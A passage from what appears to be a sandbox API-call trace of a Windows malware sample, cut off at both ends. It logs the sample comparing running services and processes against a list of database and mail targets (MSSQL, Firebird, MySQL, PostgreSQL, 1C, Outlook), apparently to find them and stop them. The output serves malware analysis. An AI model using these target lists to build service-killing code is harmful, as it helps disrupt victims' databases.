(lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0033.011] lstrlenW (lpString="Power") returned 5 [0033.011] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0033.011] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0033.011] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0033.011] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0033.011] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0033.011] lstrlenW (lpString="ProfSvc") returned 7 [0033.011] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0033.011] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0033.011] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0033.011] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0033.011] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0033.011] lstrlenW (lpString="RpcEptMapper") returned 12 [0033.012] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0033.012] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0033.012] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0033.012] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0033.012] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0033.012] lstrlenW (lpString="RpcSs") returned 5 [0033.012] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0033.012] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0033.012] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0033.012] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0033.012] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0033.012] lstrlenW (lpString="SamSs") returned 5 [0033.012] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0033.012] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0033.012] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0033.012] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0033.012] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0033.012] lstrlenW (lpString="Schedule") returned 8 [0033.012] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0033.012] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0033.012] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0033.012] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0033.012] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0033.012] lstrlenW (lpString="SENS") returned 4 [0033.012] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0033.012] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0033.012] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0033.012] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0033.012] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0033.012] lstrlenW (lpString="ShellHWDetection") returned 16 [0033.012] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0033.012] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0033.012] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0033.013] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0033.013] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0033.013] lstrlenW (lpString="Spooler") returned 7 [0033.013] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0033.013] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0033.013] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0033.013] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0033.013] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0033.013] lstrlenW (lpString="SysMain") returned 7 [0033.013] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0033.013] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0033.013] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0033.013] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0033.013] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0033.013] lstrlenW (lpString="Themes") returned 6 [0033.013] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0033.013] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0033.013] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0033.013] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0033.013] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0033.013] lstrlenW (lpString="TrkWks") returned 6 [0033.013] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0033.013] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0033.013] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0033.013] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0033.013] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0033.013] lstrlenW (lpString="UxSms") returned 5 [0033.013] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0033.013] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0033.013] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0033.013] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0033.013] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0033.013] lstrlenW (lpString="WdiServiceHost") returned 14 [0033.014] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0033.014] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0033.014] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0033.014] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0033.014] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0033.014] lstrlenW (lpString="WdiSystemHost") returned 13 [0033.014] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0033.014] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0033.014] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0033.014] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0033.014] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0033.014] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0033.014] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0033.014] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0033.014] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0033.014] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0033.014] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0033.014] lstrlenW (lpString="Winmgmt") returned 7 [0033.014] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0033.014] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0033.014] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0033.014] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0033.014] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0033.014] lstrlenW (lpString="WPDBusEnum") returned 10 [0033.014] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0033.014] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0033.014] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0033.014] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0033.014] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0033.014] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6e5120 | out: hHeap=0x5f0000) returned 1 [0033.014] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x160 [0033.017] Process32FirstW (in: hSnapshot=0x160, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0033.018] Process32NextW (in: hSnapshot=0x160, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4f, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0033.018] lstrlenW (lpString="System") returned 6 [0033.018] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0033.018] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0033.018] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0033.018] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0033.018] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0033.018] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0033.018] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0033.019] Process32NextW (in: hSnapshot=0x160, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0033.019] lstrlenW (lpString="smss.exe") returned 8 [0033.019] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0033.019] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0033.019] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0033.019] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0033.019] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0033.019] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0033.019] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0033.019] Process32NextW (in: hSnapshot=0x160, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0033.020] lstrlenW (lpString="csrss.exe") returned 9 [0033.020] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0033.020] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0033.020] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0033.020] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0033.020] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0033.020] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0033.020] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0033.020] Process32NextW (in: hSnapshot=0x160, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0033.021] lstrlenW (lpString="wininit.exe") returned 11 [0033.021] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0033.021] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0033.021] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0033.021] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0033.021] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0033.021] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0033.021] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0033.021] Process32NextW (in: hSnapshot=0x160, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0033.022] lstrlenW (lpString="csrss.exe") returned 9 [0033.022] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0033.022] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0033.022] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0033.022] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0033.022] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0033.022] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0033.022] Process32NextW (in: hSnapshot=0x160, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0033.023] lstrlenW (lpString="winlogon.exe") returned 12 [0033.023] Process32NextW (in: hSnapshot=0x160, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0033.024] lstrlenW (lpString="services.exe") returned 12 [0033.024] Process32NextW (in: hSnapshot=0x160, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0033.025] lstrlenW (lpString="lsass.exe") returned 9 [0033.025] Process32NextW (in: hSnapshot=0x160, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0033.025] lstrlenW (lpString="lsm.exe") returned 7 [0033.025] Process32NextW (in: hSnapshot=0x160, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0033.026] lstrlenW (lpString="svchost.exe") returned 11 [0033.026] Process32NextW (in: hSnapshot=0x160, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0033.027] lstrlenW (lpString="svchost.exe") returned 11 [0033.027] Process32NextW (in: hSnapshot=0x160, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0033.027] lstrlenW (lpString="svchost.exe") returned 11 [0033.027] Process32NextW (in: hSnapshot=0x160, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0033.028] lstrlenW (lpString="svchost.exe") returned 11 [0033.028] Process32NextW (in: hSnapshot=0x160, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x57, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0033.029] lstrlenW (lpString="svchost.exe") returned 11 [0033.029] Process32NextW (in: hSnapshot=0x160, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0033.029] lstrlenW (lpString="audiodg.exe") returned 11 [0033.029] Process32NextW (in: hSnapshot=0x160, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0033.030] lstrlenW (lpString="svchost.exe") returned 11 [0033.030] Process32NextW (in: hSnapshot=0x160, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0033.031] lstrlenW (lpString="svchost.exe") returned 11 [0033.031] Process32NextW (in: hSnapshot=0x160, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0033.031] lstrlenW (lpString="dwm.exe") returned 7 [0033.031] Process32NextW (in: hSnapshot=0x160, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0033.032] lstrlenW (lpString="explorer.exe") returned 12 [0033.032] Process32NextW (in: hSnapshot=0x160, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0033.033] lstrlenW (lpString="spoolsv.exe") returned 11 [0033.033] Process32NextW (in: hSnapshot=0x160, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0033.033] lstrlenW (lpString="taskhost.exe") returned 12 [0033.033] Process32NextW (in: hSnapshot=0x160, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0033.034] lstrlenW (lpString="svchost.exe") returned 11 [0033.034] Process32NextW (in: hSnapshot=0x160, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0033.035] lstrlenW (lpString="taskeng.exe") returned 11 [0033.035] Process32NextW (in: hSnapshot=0x160, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0033.035] lstrlenW (lpString="taskhost.exe") returned 12 [0033.035] Process32NextW (in: hSnapshot=0x160, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x59c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="entrepreneur.exe")) returned 1 [0033.036] lstrlenW (lpString="entrepreneur.exe") returned 16 [0033.036] Process32NextW (in: hSnapshot=0x160, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="andrew kinds.exe")) returned 1 [0033.037] lstrlenW (lpString="andrew kinds.exe") returned 16 [0033.037] Process32NextW (in: hSnapshot=0x160, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="baskets-gazette-arm.exe")) returned 1 [0033.037] lstrlenW (lpString="baskets-gazette-arm.exe") returned 23 [0033.037] Process32NextW (in: hSnapshot=0x160, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="educated.exe")) returned 1 [0033.038] lstrlenW (lpString="educated.exe") returned 12 [0033.038] Process32NextW (in: hSnapshot=0x160, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="servers.exe")) returned 1 [0033.039] lstrlenW (lpString="servers.exe") returned 11 [0033.039] Process32NextW (in: hSnapshot=0x160, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gibson-necessary.exe")) returned 1 [0033.156] lstrlenW (lpString="gibson-necessary.exe") returned 20 [0033.156] Process32NextW (in: hSnapshot=0x160, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x328, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gbp_chair.exe")) returned 1 [0033.157] lstrlenW (lpString="gbp_chair.exe") returned 13 [0033.157] Process32NextW (in: hSnapshot=0x160, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="attention infected.exe")) returned 1 [0033.157] lstrlenW (lpString="attention infected.exe") returned 22 [0033.158] Process32NextW (in: hSnapshot=0x160, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="have-oz-barrel.exe")) returned 1 [0033.158] lstrlenW (lpString="have-oz-barrel.exe") returned 18 [0033.158] Process32NextW (in: hSnapshot=0x160, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pattern amateur.exe")) returned 1 [0033.159] lstrlenW (lpString="pattern amateur.exe") returned 19 [0033.159] Process32NextW (in: hSnapshot=0x160, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="referral.exe")) returned 1 [0033.160] lstrlenW (lpString="referral.exe") returned 12 [0033.160] Process32NextW (in: hSnapshot=0x160, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="copyingseems.exe")) returned 1 [0033.160] lstrlenW (lpString="copyingseems.exe") returned 16 [0033.160] Process32NextW (in: hSnapshot=0x160, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spin generally.exe")) returned 1 [0033.161] lstrlenW (lpString="spin generally.exe") returned 18 [0033.161] Process32NextW (in: hSnapshot=0x160, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="television consolidated wav.exe")) returned 1 [0033.162] lstrlenW (lpString="television consolidated wav.exe") returned 31 [0033.162] Process32NextW (in: hSnapshot=0x160, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="transmit.exe")) returned 1 [0033.162] lstrlenW (lpString="transmit.exe") returned 12 [0033.162] Process32NextW (in: hSnapshot=0x160, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, 